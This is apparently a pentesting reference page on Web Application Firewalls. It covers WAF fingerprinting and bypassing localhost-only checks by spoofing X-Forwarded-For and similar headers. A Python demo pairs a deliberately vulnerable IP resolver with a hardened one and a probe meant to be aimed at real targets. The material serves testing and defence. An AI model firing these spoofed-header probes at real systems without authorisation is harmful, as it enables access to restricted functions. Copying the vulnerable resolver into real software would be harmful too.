WAFs
A Web Application Firewall (WAF) is an application-layer security control that inspects HTTP traffic to detect and block malicious requests targeting web applications. It is designed to prevent attacks like SQLi, XSS, and RCE by analyzing request patterns, payload structures, and known signatures. WAFs are commonly deployed as reverse proxies or inline filters in front of web servers and can interfere with exploitation by sanitizing input, normalizing requests, or blocking based on rule sets.
Detection
wafw00f detects and fingerprints the WAF product in front of a target by sending normal and malicious-looking requests and comparing the responses:
wafw00f https://<target>
Bypasses
Headers
WAFs and reverse proxies often rely on IP-based logic to enforce access control, rate-limiting, or geofencing. When requests pass through intermediary services like load balancers or CDNs, the original client IP is lost and replaced by the proxy's address at the TCP layer. To preserve it, headers such as X-Forwarded-For are commonly used to pass the client's IP address downstream to the application or security layer.
# Common headers
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Some WAFs, especially misconfigured or poorly validated ones, trust these headers without verifying that they were set by a known proxy. By setting them to 127.0.0.1, the attacker can trick the WAF or the backend application into treating the request as if it came from localhost. This may bypass access controls that restrict functionality to internal addresses, disable WAF inspection for trusted IPs, or grant administrative functions reserved for local traffic. In some cases, WAF rules explicitly whitelist 127.0.0.1 or skip inspection entirely for requests that appear to originate from the loopback interface. Which header (if any) is honoured differs per product and deployment, so send a baseline request without any of them and then one request per header, and compare status codes and response lengths.
This can be automated with Burp's Bypass WAF extension, which adds all of the above headers to every request within its configured scope.
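The following is an added example, not code from the original page or from any WAF vendor. It shows both sides of the problem: a constructed backend whose "localhost only" check reads the client IP from forwarded headers (the two it honours, X-Forwarded-For and X-Remote-Addr, are an arbitrary choice for the demo), a hardened resolver that only consults X-Forwarded-For when the socket peer is a known proxy, and a probe that sends a baseline request plus one request per spoofing header and reports which ones change the response. Because the demo server is bound to loopback, it pretends every connection arrives from the constructed external address 203.0.113.10; in a real deployment that value is the actual socket peer. The trusted proxy address 10.0.0.2 is likewise constructed.

```python
"""Probe for blind trust in client-IP headers, against a local demo backend."""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Headers that proxies/CDNs use to forward the original client IP and that a
# misconfigured WAF or backend may trust without checking who set them.
SPOOF_HEADERS = ("X-Originating-IP", "X-Forwarded-For", "X-Remote-IP", "X-Remote-Addr")
LOOPBACK = "127.0.0.1"

# Constructed: the demo backend honours only two of the four headers, so the
# probe has something to discriminate.
HONOURED_HEADERS = ("X-Forwarded-For", "X-Remote-Addr")


def resolve_client_ip_vulnerable(headers, peer_ip):
    """Vulnerable: any honoured header wins over the real socket peer."""
    for name in HONOURED_HEADERS:
        value = headers.get(name)
        if value:
            return value.split(",")[0].strip()   # leftmost hop, attacker-controlled
    return peer_ip


def resolve_client_ip_hardened(headers, peer_ip, trusted_proxies):
    """Hardened: forwarded headers count only if the peer is a known proxy.

    Walks X-Forwarded-For from the right and returns the first hop that is
    not one of our own proxies; anything the client prepended is ignored.
    """
    if peer_ip not in trusted_proxies:
        return peer_ip
    xff = headers.get("X-Forwarded-For") or ""
    for hop in reversed([h.strip() for h in xff.split(",") if h.strip()]):
        if hop not in trusted_proxies:
            return hop
    return peer_ip


class DemoHandler(BaseHTTPRequestHandler):
    """Constructed backend: /admin is meant to be reachable from localhost only."""

    def log_message(self, *_args):      # keep the demo quiet
        pass

    def do_GET(self):
        # Demo binds to loopback, so fake an external peer; in production this
        # would simply be self.client_address[0].
        peer = self.server.simulated_peer
        client_ip = self.server.resolver(self.headers, peer)
        status = 200 if (self.path != "/admin" or client_ip == LOOPBACK) else 403
        self.send_response(status)
        self.send_header("Content-Length", "0")
        self.end_headers()


class DemoServer(HTTPServer):
    def __init__(self, resolver, simulated_peer="203.0.113.10"):   # constructed peer
        super().__init__(("127.0.0.1", 0), DemoHandler)
        self.resolver = resolver
        self.simulated_peer = simulated_peer


def start_server(resolver):
    """Start a demo backend on a random loopback port; returns (server, base_url)."""
    srv = DemoServer(resolver)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def fetch_status(url, extra_headers=None):
    try:
        with urlopen(Request(url, headers=extra_headers or {}), timeout=5) as resp:
            return resp.getcode()
    except HTTPError as err:            # 4xx/5xx still carry a status code
        return err.code


def probe(url, spoof_value=LOOPBACK):
    """Baseline request, then one request per header; returns {name: status}."""
    results = {"baseline": fetch_status(url)}
    for name in SPOOF_HEADERS:
        results[name] = fetch_status(url, {name: spoof_value})
    return results


def bypassing_headers(results):
    """Headers whose status differs from the baseline, i.e. the ones honoured."""
    base = results["baseline"]
    return [name for name, status in results.items() if name != "baseline" and status != base]


if __name__ == "__main__":
    hardened = lambda h, p: resolve_client_ip_hardened(h, p, {"10.0.0.2"})
    for label, resolver in (("vulnerable", resolve_client_ip_vulnerable), ("hardened", hardened)):
        srv, base = start_server(resolver)
        res = probe(base + "/admin")
        srv.shutdown()
        srv.server_close()
        print(label, res, "bypass via:", bypassing_headers(res))
```

Against a real target, point probe() at the restricted URL instead of the demo server; compare status codes first, then response lengths and bodies, since some WAFs answer a blocked request with a 200 page rather than a 403. The hardened resolver shows why "strip the header at the edge" is not enough on its own: the application must also know which peers are its proxies, otherwise a direct connection to the origin bypasses the edge entirely.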